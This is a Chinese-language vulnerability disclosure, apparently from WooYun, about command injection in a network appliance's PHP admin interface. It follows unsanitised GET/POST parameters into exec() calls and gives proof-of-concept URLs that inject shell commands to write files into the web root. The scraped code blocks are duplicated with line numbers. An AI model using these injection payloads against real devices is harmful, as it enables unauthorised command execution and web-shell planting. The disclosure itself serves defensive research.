bytecache_run_action.php:
require_once dirname(__FILE__)."/../common/commandWrapper.inc";
require_once dirname(__FILE__)."/../common/UciUtil.inc";
$action = $_GET['action'];
$engine = $_GET['engine'];
$ipfilter= $_GET['ipfilter'];
if($action=="1"){
$ipFilterArray = split("[/.]",$ipfilter);
for($m =0 ;$m<4 ;$m++){
if($ipFilterArray[$m]>15){
$ipFilterArray[$m]=dechex($ipFilterArray[$m]);
}else{
$ipFilterArray[$m]="0".dechex($ipFilterArray[$m]);
}
}$ipFilterNum =$ipFilterArray[0].$ipFilterArray[1].$ipFilterArray[2].$ipFilterArray[3];
UciUtil::setValue('appex', 'sys', 'BCDebugEngineId',$engine);
UciUtil::setValue('appex', 'sys', 'BCDebugIpFilter',$ipfilter);
startByteCacheDebug($engine,$ipFilterNum);
}else{
$engine = UciUtil::getValue('appex', 'sys', 'BCDebugEngineId');
stopByteCacheDebug($engine);
}?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
require_oncedirname(__FILE__)."/../common/commandWrapper.inc";
require_oncedirname(__FILE__)."/../common/UciUtil.inc";
$action=$_GET['action'];
$engine=$_GET['engine'];
$ipfilter=$_GET['ipfilter'];
if($action=="1"){
$ipFilterArray=split("[/.]",$ipfilter);
for($m=0;$m<4;$m++){
if($ipFilterArray[$m]>15){
$ipFilterArray[$m]=dechex($ipFilterArray[$m]);
}else{
$ipFilterArray[$m]="0".dechex($ipFilterArray[$m]);
}
}$ipFilterNum=$ipFilterArray[0].$ipFilterArray[1].$ipFilterArray[2].$ipFilterArray[3];
UciUtil::setValue('appex','sys','BCDebugEngineId',$engine);
UciUtil::setValue('appex','sys','BCDebugIpFilter',$ipfilter);
startByteCacheDebug($engine,$ipFilterNum);
}else{
$engine=UciUtil::getValue('appex','sys','BCDebugEngineId');
stopByteCacheDebug($engine);
}?>
第一处:setValue跟进去:
public static function setValue($package, $config, $option, $value){
self::getUciDao()->set($package, $config, $option, $value);
}
1
2
3
publicstaticfunctionsetValue($package,$config,$option,$value){
self::getUciDao()->set($package,$config,$option,$value);
}
再跟进去:
public function setConfig($package,$config,$value){
$cmd = UCI_CMD." set ".$package.".".$config."=".$value;
exec($cmd);
}
1
2
3
4
publicfunctionsetConfig($package,$config,$value){
$cmd=UCI_CMD." set ".$package.".".$config."=".$value;
exec($cmd);
}
说明value可控第二处:startByteCacheDebug($engine,$ipFilterNum);跟进去:
function startByteCacheDebug($engine,$ipFilter){
$command = "/tmp/appexcfg/bin/apxdebug.sh start "." ".$engine." ".$ipFilter." >/dev/null &";
execute($command);
}
1
2
3
4
functionstartByteCacheDebug($engine,$ipFilter){
$command="/tmp/appexcfg/bin/apxdebug.sh start "." ".$engine." ".$ipFilter." >/dev/null &";
execute($command);
}
第三处:当action 不是1的时候stopByteCacheDebug($engine);跟进去:
function stopByteCacheDebug($engine){
$command = "/tmp/appexcfg/bin/apxdebug.sh stop "." ".$engine." & ";
execute($command);
//echo $command;
}
1
2
3
4
5
functionstopByteCacheDebug($engine){
$command="/tmp/appexcfg/bin/apxdebug.sh stop "." ".$engine." & ";
execute($command);
//echo $command;
}
证明一处即可:**.**.**.**:8080/acc/debug/bytecache_run_action.php?action=1&engine= | echo wooyun > a.php | &ipfilter=10访问:**.**.**.**:8080/acc/debug/a.php第四处:change_lan.php
$lanID = 'En';$refLink = $_SERVER['HTTP_REFERER'];
if(empty($refLink)){
$refLink = "/index.php";
}
$refLink = str_replace("?error=1", "", $refLink);
if(array_key_exists('LanID',$_REQUEST))
{
$lanID = $_REQUEST["LanID"];
$appexSystemDao = new AppexSystemDao();
$appexSystemDao->setAppexSystemConfigItemValue(LANGUAGE_ID_FIELD,$lanID);
$appexSystemDao->commit();
session_start();
1
2
3
4
5
6
7
8
9
10
11
12
$lanID='En';$refLink=$_SERVER['HTTP_REFERER'];
if(empty($refLink)){
$refLink="/index.php";
}
$refLink=str_replace("?error=1","",$refLink);
if(array_key_exists('LanID',$_REQUEST))
{
$lanID=$_REQUEST["LanID"];
$appexSystemDao=newAppexSystemDao();
$appexSystemDao->setAppexSystemConfigItemValue(LANGUAGE_ID_FIELD,$lanID);
$appexSystemDao->commit();
session_start();
跟进setAppexSystemConfigItemValue:
public function setAppexSystemConfigItemValue($option,$value){
parent::set(UCI_APPEX,"sys",$option,$value);
}
1
2
3
publicfunctionsetAppexSystemConfigItemValue($option,$value){
parent::set(UCI_APPEX,"sys",$option,$value);
}
再跟进;
public function set($package,$config,$option,$value){
$cmd = UCI_CMD." set ".$package.".".$config.".".$option."='".$value."'";
exec($cmd);
}
1
2
3
4
publicfunctionset($package,$config,$option,$value){
$cmd=UCI_CMD." set ".$package.".".$config.".".$option."='".$value."'";
exec($cmd);
}
**.**.**.**:8080/change_lan.phppostdata:LanID=1' | echo ' wooyun' > a.php | '
第五处:enable_tool_debug.php:
require_once dirname(__FILE__)."/../common/commandWrapper.inc";
error_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);
$val = $_GET['val'];
$tool = $_GET['tool'];
$par = $_GET['par'];
runTool($val,$tool,$par);
?>
1
2
3
4
5
6
7
8
require_oncedirname(__FILE__)."/../common/commandWrapper.inc";
error_reporting(E_ALL^E_WARNING^E_NOTICE);
$val=$_GET['val'];
$tool=$_GET['tool'];
$par=$_GET['par'];
runTool($val,$tool,$par);
?>
runTool:
function runTool($val,$tool,$par){
if($val=="0"){
UciUtil::setValue('system', 'runtool', 'tool', $tool);
UciUtil::setValue('system', 'runtool', 'parameter', $par);
UciUtil::commit('system');
if($tool=="1"){
exec('ping '.$par.'>/tmp/tool_result &');
}else if($tool=="2"){
exec('traceroute '.$par.'>/tmp/tool_result &');
}
}else if($val=="1"){
$tool=UciUtil::getValue('system', 'runtool', 'tool');
if($tool=="1"){
exec('killall ping ');
}else if($tool=="2"){
exec('killall traceroute ');
}
UciUtil::setValue('system', 'runtool', 'tool', '');
UciUtil::setValue('system', 'runtool', 'parameter', '');
UciUtil::commit('system');
exec('echo "">/tmp/tool_result');
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
functionrunTool($val,$tool,$par){
if($val=="0"){
UciUtil::setValue('system','runtool','tool',$tool);
UciUtil::setValue('system','runtool','parameter',$par);
UciUtil::commit('system');
if($tool=="1"){
exec('ping '.$par.'>/tmp/tool_result &');
}elseif($tool=="2"){
exec('traceroute '.$par.'>/tmp/tool_result &');
}
}elseif($val=="1"){
$tool=UciUtil::getValue('system','runtool','tool');
if($tool=="1"){
exec('killall ping ');
}elseif($tool=="2"){
exec('killall traceroute ');
}
UciUtil::setValue('system','runtool','tool','');
UciUtil::setValue('system','runtool','parameter','');
UciUtil::commit('system');
exec('echo "">/tmp/tool_result');
}
**.**.**.**:8080/acc/tools/enable_tool_debug.php?val=0&tool=1&par=**.**.**.**' | echo wooyun > a.php | '
getMacAddr.php:
include_once dirname(__FILE__).'/../common/commandWrapper.inc';
$tmpeth = $_GET['eth'];
$tmpmacAddr = strtoupper(getMacAddrFromIfName($tmpeth));
echo ' ';
?>
1
2
3
4
5
6
include_oncedirname(__FILE__).'/../common/commandWrapper.inc';
$tmpeth=$_GET['eth'];
$tmpmacAddr=strtoupper(getMacAddrFromIfName($tmpeth));
echo' ';
?>
跟进getMacAddrFromIfName
function getMacAddrFromIfName($ifName){
$mac = execute('cat /sys/class/net/' . trim($ifName) . '/address')->get('output');
if($mac != null && $mac != '')
return $mac[0];
else
return '';}
1
2
3
4
5
6
functiongetMacAddrFromIfName($ifName){
$mac=execute('cat /sys/class/net/'.trim($ifName).'/address')->get('output');
if($mac!=null&&$mac!='')
return$mac[0];
else
return'';}
**.**.**.**:8080/acc/network/getMacAddr.php?eth= | echo wooyun > c.php |访问**.**.**.**:8080/acc/network/c.php 即可**.**.**.**:8080/**.**.**.**:8080/**.**.**.**:8080**.**.**.**:8080